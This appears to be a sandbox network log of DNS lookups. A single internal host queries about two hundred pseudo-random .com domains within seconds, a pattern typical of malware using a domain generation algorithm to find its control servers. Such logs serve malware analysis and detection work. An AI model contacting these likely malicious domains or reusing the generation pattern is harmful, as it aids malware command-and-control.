Aug 23, 2024 18:48:56.967578888 CEST	192.168.2.4	1.1.1.1	0xee47	Standard query (0)	lysyvax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.967735052 CEST	192.168.2.4	1.1.1.1	0x7890	Standard query (0)	vonyryk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.967916965 CEST	192.168.2.4	1.1.1.1	0xbce1	Standard query (0)	qekyhug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.968441963 CEST	192.168.2.4	1.1.1.1	0xf183	Standard query (0)	ganyrew.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.968790054 CEST	192.168.2.4	1.1.1.1	0x604f	Standard query (0)	pupycop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.969013929 CEST	192.168.2.4	1.1.1.1	0xaa03	Standard query (0)	lykygun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.969542027 CEST	192.168.2.4	1.1.1.1	0x13f8	Standard query (0)	vopycoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.969542027 CEST	192.168.2.4	1.1.1.1	0xf265	Standard query (0)	qebyrel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.969949007 CEST	192.168.2.4	1.1.1.1	0x88e4	Standard query (0)	pujygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.970093966 CEST	192.168.2.4	1.1.1.1	0x886	Standard query (0)	gatycis.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.970608950 CEST	192.168.2.4	1.1.1.1	0xcae9	Standard query (0)	lyvywar.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.970963001 CEST	192.168.2.4	1.1.1.1	0x5c33	Standard query (0)	puvywal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.971239090 CEST	192.168.2.4	1.1.1.1	0xa1fc	Standard query (0)	qetyxiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973064899 CEST	192.168.2.4	1.1.1.1	0xcac0	Standard query (0)	gahyfyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973064899 CEST	192.168.2.4	1.1.1.1	0x9734	Standard query (0)	gacyqoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973176003 CEST	192.168.2.4	1.1.1.1	0xad47	Standard query (0)	lyryxud.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973309040 CEST	192.168.2.4	1.1.1.1	0x62ec	Standard query (0)	vojygym.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973443985 CEST	192.168.2.4	1.1.1.1	0xa6c6	Standard query (0)	qegyfeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973443985 CEST	192.168.2.4	1.1.1.1	0x9b40	Standard query (0)	qexyqip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973617077 CEST	192.168.2.4	1.1.1.1	0x480c	Standard query (0)	pufydaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973722935 CEST	192.168.2.4	1.1.1.1	0x4229	Standard query (0)	gaqyzyb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973833084 CEST	192.168.2.4	1.1.1.1	0xc22f	Standard query (0)	lyxymix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.973833084 CEST	192.168.2.4	1.1.1.1	0xf470	Standard query (0)	vowyzuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974020004 CEST	192.168.2.4	1.1.1.1	0x810a	Standard query (0)	vofydak.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974184036 CEST	192.168.2.4	1.1.1.1	0xf152	Standard query (0)	qeqylyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974404097 CEST	192.168.2.4	1.1.1.1	0x8436	Standard query (0)	lygyfej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974404097 CEST	192.168.2.4	1.1.1.1	0x3880	Standard query (0)	puzymup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974487066 CEST	192.168.2.4	1.1.1.1	0x87cb	Standard query (0)	gadydow.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974662066 CEST	192.168.2.4	1.1.1.1	0xc400	Standard query (0)	vocyqot.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:56.974662066 CEST	192.168.2.4	1.1.1.1	0x58c3	Standard query (0)	puryxuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.508971930 CEST	192.168.2.4	1.1.1.1	0x8209	Standard query (0)	lymylen.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.509469986 CEST	192.168.2.4	1.1.1.1	0x84db	Standard query (0)	qedysol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.509562016 CEST	192.168.2.4	1.1.1.1	0x80a1	Standard query (0)	volymuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.510099888 CEST	192.168.2.4	1.1.1.1	0x7ab9	Standard query (0)	galynus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.510241985 CEST	192.168.2.4	1.1.1.1	0x29c9	Standard query (0)	pumyleg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.510726929 CEST	192.168.2.4	1.1.1.1	0xd729	Standard query (0)	lysysir.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.510864973 CEST	192.168.2.4	1.1.1.1	0x1353	Standard query (0)	vonykam.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.511493921 CEST	192.168.2.4	1.1.1.1	0x42ab	Standard query (0)	ganykah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.511518955 CEST	192.168.2.4	1.1.1.1	0xd34a	Standard query (0)	qekynyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.511765957 CEST	192.168.2.4	1.1.1.1	0x4e68	Standard query (0)	lykynyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.512259007 CEST	192.168.2.4	1.1.1.1	0x5b8b	Standard query (0)	pupypil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.512583971 CEST	192.168.2.4	1.1.1.1	0xa50f	Standard query (0)	vopyput.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.512696028 CEST	192.168.2.4	1.1.1.1	0x8a54	Standard query (0)	qebykoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.513358116 CEST	192.168.2.4	1.1.1.1	0x5188	Standard query (0)	pujybev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.513694048 CEST	192.168.2.4	1.1.1.1	0x8f68	Standard query (0)	gatypuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.514842987 CEST	192.168.2.4	1.1.1.1	0xa9b8	Standard query (0)	lyvyjoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.515182972 CEST	192.168.2.4	1.1.1.1	0x5704	Standard query (0)	vojybef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.516066074 CEST	192.168.2.4	1.1.1.1	0x6c2	Standard query (0)	qetytup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.516594887 CEST	192.168.2.4	1.1.1.1	0xa7e5	Standard query (0)	puvyjiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.517450094 CEST	192.168.2.4	1.1.1.1	0xab3b	Standard query (0)	gahyvab.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.519821882 CEST	192.168.2.4	1.1.1.1	0x89c9	Standard query (0)	lyrytyx.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.520457983 CEST	192.168.2.4	1.1.1.1	0xded5	Standard query (0)	vocyjik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.521169901 CEST	192.168.2.4	1.1.1.1	0x3308	Standard query (0)	qegyvag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.521533012 CEST	192.168.2.4	1.1.1.1	0xc11f	Standard query (0)	purytyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.522382975 CEST	192.168.2.4	1.1.1.1	0xe2d4	Standard query (0)	gacyhuw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.522849083 CEST	192.168.2.4	1.1.1.1	0x6cb3	Standard query (0)	lygyvon.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.523546934 CEST	192.168.2.4	1.1.1.1	0xb35	Standard query (0)	vowyrec.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.524043083 CEST	192.168.2.4	1.1.1.1	0x168d	Standard query (0)	qexyhul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.524805069 CEST	192.168.2.4	1.1.1.1	0x1abc	Standard query (0)	pufycog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.525094986 CEST	192.168.2.4	1.1.1.1	0x123a	Standard query (0)	gaqyres.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.526118994 CEST	192.168.2.4	1.1.1.1	0x7495	Standard query (0)	lyxygur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.526485920 CEST	192.168.2.4	1.1.1.1	0xb4c7	Standard query (0)	vofycim.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.527551889 CEST	192.168.2.4	1.1.1.1	0x2613	Standard query (0)	qeqyrav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.528120995 CEST	192.168.2.4	1.1.1.1	0x59ec	Standard query (0)	puzygyl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.529037952 CEST	192.168.2.4	1.1.1.1	0x944d	Standard query (0)	gadycih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.529656887 CEST	192.168.2.4	1.1.1.1	0xcf07	Standard query (0)	lymywad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.530911922 CEST	192.168.2.4	1.1.1.1	0xad73	Standard query (0)	volygyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.532017946 CEST	192.168.2.4	1.1.1.1	0xaf0d	Standard query (0)	qedyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.535172939 CEST	192.168.2.4	1.1.1.1	0x163d	Standard query (0)	pumywov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.537120104 CEST	192.168.2.4	1.1.1.1	0xf5b0	Standard query (0)	galyfez.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.537296057 CEST	192.168.2.4	1.1.1.1	0xcbd4	Standard query (0)	vonyqof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.537668943 CEST	192.168.2.4	1.1.1.1	0x26cf	Standard query (0)	lysyxuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.537816048 CEST	192.168.2.4	1.1.1.1	0x790	Standard query (0)	qekyfep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.538399935 CEST	192.168.2.4	1.1.1.1	0x36d8	Standard query (0)	ganyqib.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.538774014 CEST	192.168.2.4	1.1.1.1	0xeab7	Standard query (0)	lykyfax.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.538961887 CEST	192.168.2.4	1.1.1.1	0xc316	Standard query (0)	pupyxuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.539279938 CEST	192.168.2.4	1.1.1.1	0xadc1	Standard query (0)	vopyzyk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.540028095 CEST	192.168.2.4	1.1.1.1	0x5f9d	Standard query (0)	qebyqig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.540302992 CEST	192.168.2.4	1.1.1.1	0xdc59	Standard query (0)	gatyzyw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.540555954 CEST	192.168.2.4	1.1.1.1	0x2fd1	Standard query (0)	pujydap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541163921 CEST	192.168.2.4	1.1.1.1	0x69c2	Standard query (0)	lyvymun.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541523933 CEST	192.168.2.4	1.1.1.1	0xc32a	Standard query (0)	qetylel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541697025 CEST	192.168.2.4	1.1.1.1	0x2aad	Standard query (0)	gahydos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.541789055 CEST	192.168.2.4	1.1.1.1	0xbef2	Standard query (0)	puvymug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.542021990 CEST	192.168.2.4	1.1.1.1	0xc8e9	Standard query (0)	lyryler.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.542157888 CEST	192.168.2.4	1.1.1.1	0xf3c6	Standard query (0)	vojydoc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.543114901 CEST	192.168.2.4	1.1.1.1	0xb0bc	Standard query (0)	vocymum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.543308973 CEST	192.168.2.4	1.1.1.1	0xfc4	Standard query (0)	qegysiv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.543549061 CEST	192.168.2.4	1.1.1.1	0x6ee1	Standard query (0)	purylal.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.543703079 CEST	192.168.2.4	1.1.1.1	0x506c	Standard query (0)	gacynyh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544053078 CEST	192.168.2.4	1.1.1.1	0xae63	Standard query (0)	lygysid.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544305086 CEST	192.168.2.4	1.1.1.1	0x7a36	Standard query (0)	qexynyq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544574976 CEST	192.168.2.4	1.1.1.1	0x6191	Standard query (0)	vowykat.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.544915915 CEST	192.168.2.4	1.1.1.1	0xe39d	Standard query (0)	pufypuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.730747938 CEST	192.168.2.4	1.1.1.1	0xafb7	Standard query (0)	gaqykoz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.731004000 CEST	192.168.2.4	1.1.1.1	0xa6bf	Standard query (0)	qeqykop.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.731544971 CEST	192.168.2.4	1.1.1.1	0x3885	Standard query (0)	puzybeq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.763485909 CEST	192.168.2.4	1.1.1.1	0x6b92	Standard query (0)	gadypub.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.763761997 CEST	192.168.2.4	1.1.1.1	0xd728	Standard query (0)	lymyjix.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.837583065 CEST	192.168.2.4	1.1.1.1	0x53b2	Standard query (0)	lyxynej.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.838190079 CEST	192.168.2.4	1.1.1.1	0xe7ca	Standard query (0)	vofypuf.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.838392019 CEST	192.168.2.4	1.1.1.1	0x5004	Standard query (0)	qedytyg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.838807106 CEST	192.168.2.4	1.1.1.1	0xf935	Standard query (0)	pumyjip.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.839296103 CEST	192.168.2.4	1.1.1.1	0xb591	Standard query (0)	galyvaw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.839483976 CEST	192.168.2.4	1.1.1.1	0xa711	Standard query (0)	lysytyn.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.839859962 CEST	192.168.2.4	1.1.1.1	0x1e31	Standard query (0)	vonyjuc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.840145111 CEST	192.168.2.4	1.1.1.1	0xedf1	Standard query (0)	qekyvol.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.841301918 CEST	192.168.2.4	1.1.1.1	0x21d1	Standard query (0)	pupyteg.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.847120047 CEST	192.168.2.4	1.1.1.1	0x5097	Standard query (0)	ganyhus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.847403049 CEST	192.168.2.4	1.1.1.1	0x1433	Standard query (0)	lykyvor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.851294994 CEST	192.168.2.4	1.1.1.1	0xbec1	Standard query (0)	vopyrem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.851603031 CEST	192.168.2.4	1.1.1.1	0x3241	Standard query (0)	qebyhuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.851784945 CEST	192.168.2.4	1.1.1.1	0x65e2	Standard query (0)	gatyrah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.855057001 CEST	192.168.2.4	1.1.1.1	0xdb3d	Standard query (0)	pujycil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.855210066 CEST	192.168.2.4	1.1.1.1	0xb2f1	Standard query (0)	lyvygyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.855385065 CEST	192.168.2.4	1.1.1.1	0x1e56	Standard query (0)	qetyraq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.855525970 CEST	192.168.2.4	1.1.1.1	0x56f	Standard query (0)	gahycuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.859194994 CEST	192.168.2.4	1.1.1.1	0x9697	Standard query (0)	lyrywoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.859404087 CEST	192.168.2.4	1.1.1.1	0x62a9	Standard query (0)	vocygef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.863065004 CEST	192.168.2.4	1.1.1.1	0x921d	Standard query (0)	purywoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.863277912 CEST	192.168.2.4	1.1.1.1	0xaca5	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.871063948 CEST	192.168.2.4	1.1.1.1	0xa4fb	Standard query (0)	qegyxup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.871243954 CEST	192.168.2.4	1.1.1.1	0x8dc9	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.882921934 CEST	192.168.2.4	1.1.1.1	0x2fc3	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.883125067 CEST	192.168.2.4	1.1.1.1	0xcfa	Standard query (0)	qexyfag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.883280039 CEST	192.168.2.4	1.1.1.1	0x2067	Standard query (0)	pufyxyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.883424997 CEST	192.168.2.4	1.1.1.1	0x6325	Standard query (0)	gaqyqiw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.894892931 CEST	192.168.2.4	1.1.1.1	0x71ce	Standard query (0)	lyxyfan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.898215055 CEST	192.168.2.4	1.1.1.1	0x7960	Standard query (0)	vofyzyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.898442984 CEST	192.168.2.4	1.1.1.1	0xc28b	Standard query (0)	qeqyqul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.898585081 CEST	192.168.2.4	1.1.1.1	0xaaa	Standard query (0)	puzydog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.906017065 CEST	192.168.2.4	1.1.1.1	0xd6d1	Standard query (0)	gatyfus.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.906232119 CEST	192.168.2.4	1.1.1.1	0x56ee	Standard query (0)	lyvyxor.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.906397104 CEST	192.168.2.4	1.1.1.1	0xb474	Standard query (0)	vojyqem.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.906539917 CEST	192.168.2.4	1.1.1.1	0x451e	Standard query (0)	qetyfuv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.910068989 CEST	192.168.2.4	1.1.1.1	0xbf17	Standard query (0)	gahyqah.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.910201073 CEST	192.168.2.4	1.1.1.1	0x5190	Standard query (0)	puvyxil.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.910339117 CEST	192.168.2.4	1.1.1.1	0x1b87	Standard query (0)	lyryfyd.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.914144993 CEST	192.168.2.4	1.1.1.1	0xfdfb	Standard query (0)	vocyzit.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.914334059 CEST	192.168.2.4	1.1.1.1	0x2a36	Standard query (0)	qegyqaq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.914483070 CEST	192.168.2.4	1.1.1.1	0x979	Standard query (0)	purydyv.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.914609909 CEST	192.168.2.4	1.1.1.1	0xe481	Standard query (0)	gacyzuz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.918370008 CEST	192.168.2.4	1.1.1.1	0x13d0	Standard query (0)	lygymoj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.918540001 CEST	192.168.2.4	1.1.1.1	0x7e4a	Standard query (0)	vowydef.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.922507048 CEST	192.168.2.4	1.1.1.1	0x52e3	Standard query (0)	qexylup.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.922621012 CEST	192.168.2.4	1.1.1.1	0x8323	Standard query (0)	gaqydeb.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.926162958 CEST	192.168.2.4	1.1.1.1	0xeabf	Standard query (0)	pufymoq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.926629066 CEST	192.168.2.4	1.1.1.1	0x165e	Standard query (0)	lyxylux.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.930525064 CEST	192.168.2.4	1.1.1.1	0x6de8	Standard query (0)	vofymik.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.930731058 CEST	192.168.2.4	1.1.1.1	0xc7	Standard query (0)	qeqysag.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.934431076 CEST	192.168.2.4	1.1.1.1	0xcc6b	Standard query (0)	puzylyp.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.934629917 CEST	192.168.2.4	1.1.1.1	0x271c	Standard query (0)	gadyniw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.934792042 CEST	192.168.2.4	1.1.1.1	0xfc95	Standard query (0)	lymysan.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.938487053 CEST	192.168.2.4	1.1.1.1	0xfa98	Standard query (0)	volykyc.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.938776016 CEST	192.168.2.4	1.1.1.1	0x1714	Standard query (0)	qedynul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.072338104 CEST	192.168.2.4	1.1.1.1	0xc2b6	Standard query (0)	pumypog.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.110388041 CEST	192.168.2.4	1.1.1.1	0x2610	Standard query (0)	galykes.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.138926983 CEST	192.168.2.4	1.1.1.1	0xdaa9	Standard query (0)	lysynur.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.139354944 CEST	192.168.2.4	1.1.1.1	0x6f16	Standard query (0)	vonypom.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.145874977 CEST	192.168.2.4	1.1.1.1	0xa2eb	Standard query (0)	qekykev.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.146394014 CEST	192.168.2.4	1.1.1.1	0xa8f5	Standard query (0)	pupybul.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.147366047 CEST	192.168.2.4	1.1.1.1	0xe16d	Standard query (0)	ganypih.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.162859917 CEST	192.168.2.4	1.1.1.1	0xf744	Standard query (0)	lykyjad.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.177238941 CEST	192.168.2.4	1.1.1.1	0x297a	Standard query (0)	vopybyt.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.361932993 CEST	192.168.2.4	1.1.1.1	0x376c	Standard query (0)	qebytiq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.368675947 CEST	192.168.2.4	1.1.1.1	0xff7	Standard query (0)	pujyjav.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.369178057 CEST	192.168.2.4	1.1.1.1	0xd6f2	Standard query (0)	gatyvyz.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.369748116 CEST	192.168.2.4	1.1.1.1	0x46a3	Standard query (0)	lyvytuj.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.369957924 CEST	192.168.2.4	1.1.1.1	0x5318	Standard query (0)	vojyjof.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.370162964 CEST	192.168.2.4	1.1.1.1	0xc569	Standard query (0)	qetyvep.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.370496035 CEST	192.168.2.4	1.1.1.1	0x6f89	Standard query (0)	puvytuq.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.370800018 CEST	192.168.2.4	1.1.1.1	0x126a	Standard query (0)	gahyhob.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.371210098 CEST	192.168.2.4	1.1.1.1	0x4945	Standard query (0)	lyryvex.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.371382952 CEST	192.168.2.4	1.1.1.1	0x1a06	Standard query (0)	vocyruk.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.371784925 CEST	192.168.2.4	1.1.1.1	0x7614	Standard query (0)	qegyhig.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.372275114 CEST	192.168.2.4	1.1.1.1	0xbe1	Standard query (0)	purycap.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.372477055 CEST	192.168.2.4	1.1.1.1	0x1abf	Standard query (0)	gacyryw.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.380325079 CEST	192.168.2.4	1.1.1.1	0x82c7	Standard query (0)	lygygin.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.380562067 CEST	192.168.2.4	1.1.1.1	0xdd72	Standard query (0)	vowycac.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.380748987 CEST	192.168.2.4	1.1.1.1	0x6f0c	Standard query (0)	qexyryl.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.383908033 CEST	192.168.2.4	1.1.1.1	0x8299	Standard query (0)	pufygug.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.384160995 CEST	192.168.2.4	1.1.1.1	0x662e	Standard query (0)	gaqycos.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.384596109 CEST	192.168.2.4	1.1.1.1	0x746e	Standard query (0)	lyxywer.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.384754896 CEST	192.168.2.4	1.1.1.1	0xaf4d	Standard query (0)	vofygum.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.385205984 CEST	192.168.2.4	1.1.1.1	0xbea3	Standard query (0)	qeqyxov.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.392108917 CEST	192.168.2.4	1.1.1.1	0xe9ad	Standard query (0)	puzywel.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.392283916 CEST	192.168.2.4	1.1.1.1	0xc933	Standard query (0)	gadyfuh.com	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.395801067 CEST	192.168.2.4	1.1.1.1	0xf1bf	Standard query (0)	lymyxid.com	A (IP address)	IN (0x0001)	false
